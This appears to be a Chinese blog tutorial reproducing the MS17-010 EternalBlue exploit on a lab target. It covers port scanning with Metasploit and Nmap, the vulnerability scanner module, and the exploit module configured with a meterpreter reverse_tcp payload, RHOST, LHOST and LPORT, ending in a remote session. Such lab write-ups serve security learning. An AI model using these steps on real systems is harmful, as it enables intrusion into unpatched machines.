MS17-010 永恒之蓝复现

地球胖头鱼 2021-04-23
系统与内网安全 发布于 2021-04-23 10:40:23 阅读 108 评论 0

简介

永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。

为什么要写这篇文章呢,就是我复现过很次这个漏洞,但是没有做过一次记录。这个漏洞和心脏出血漏洞这都是比较有名的漏洞,而且这个漏洞使用MSF的次数比较多这样既可以锻炼MSF工具的使用也可以对该漏洞有一定的认识和了解。还有一个很重要的问题,虽然该漏洞是17年的漏洞,但是现在很多老版本的服务器还存在该漏洞,这样说还是有利用价值的。

复现漏洞

信息收集

这里常见的信息收集方法有两种:

  1. 使用MSF工具的扫描模块,通过search scanner可以查看大量的扫描模块,这里通过search portscan命令查看端口扫描器列表,输入use 模块名,即可使用该模块。这里以使用syn扫描模块为例。

可以看到这里扫描的结果显示目标记器0-500的端口内开了135,139,445端口。而永恒之蓝利用的就是445端口 smb服务 操作系统溢出漏洞

  1. 使用NMAP端口扫描工具,这个比使用MSf更简单,而且更神奇的是在MSF中可以直接使用NMAP来进行扫描,实例如下:

从上图中可以看出也开启的445端口,说明可以尝试使用MSF自带的ms17-010模块来进行攻击。

尝试攻击

  1. 查看漏洞模块

使用search ms17-010查看永恒之蓝的攻击模块,可以看到有auxiliary(辅助)模块和exploit(攻击)模块

  1. 使用辅助扫描模块测试

使用use auxiliary/scanner/smb/smb_ms17_010命令,扫描结果显示该靶机很容易受到ms17-010的攻击。

  1. 使用攻击模块进行攻击

选择攻击模块时注意选择合适的版本,有些版本使用于win8以上。介绍一下每个字段的含义:

  • set payload :设置payload,这里用set payload windows/x64/meterpreter/reverse_tcp要选用其他payload可以使用show payloads查看适合要攻击的目标主机的payload

  • show options :使用该命令会列出使用当前模块所需呀配置的参数

  • set RHOST 目标主机地址 :该命令会设置好要攻击的目标主机地址

  • set LHOST 攻击机地址 :该命令设置攻击机的地址,使目标主机回连至攻击机

  • set LPORT 回连的端口 :该命令设置目标主机回连至攻击机的端口,默认为4444

  • run:开始攻击

攻击成功后攻击机和目标主机之间会建立一个连接,得到一个meterpreter会话

对上面四个巨大的箭头进行注解:

  • ①:表示永恒之蓝覆盖成功完成

  • ②:目标主机和攻击机建立了了一个shell连接,会话为session 1

  • ③:得到一个meterpreter会话,尝试获取shell失败

  • ④:在meterpreter会话下输入ps就能获得目标主机的当前进程

总结

meterpreter是metasploit框架中的一个扩展模块,是后渗透攻击中的杀手锏,使用meterpreter作为攻击载荷,建立连接后可以对目标系统进行更深入的渗透。再有就是上述的什么信息收集啊、扫描啊、攻击啊都是在靶机的测试环境中进行的,千万不要在没有授权的情况下攻击任何一台机子。还有就是成功拿到权限后开启远程登录功能,然后远程连接整个复现就结束了。最后还是文章中可能存在技术问题希望有大佬在评论区指正。

本作品采用《CC 协议》,转载必须注明作者和本文链接
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!
地球胖头鱼
未填写
  • 作者发布文章248
  • 作者收获粉丝10
  • 作者收到点赞3
  • 所有文章被收藏了5
  • 博客总访问量排行第2
  • 博客总访问量7.6 万(每日更新)
查看所有博文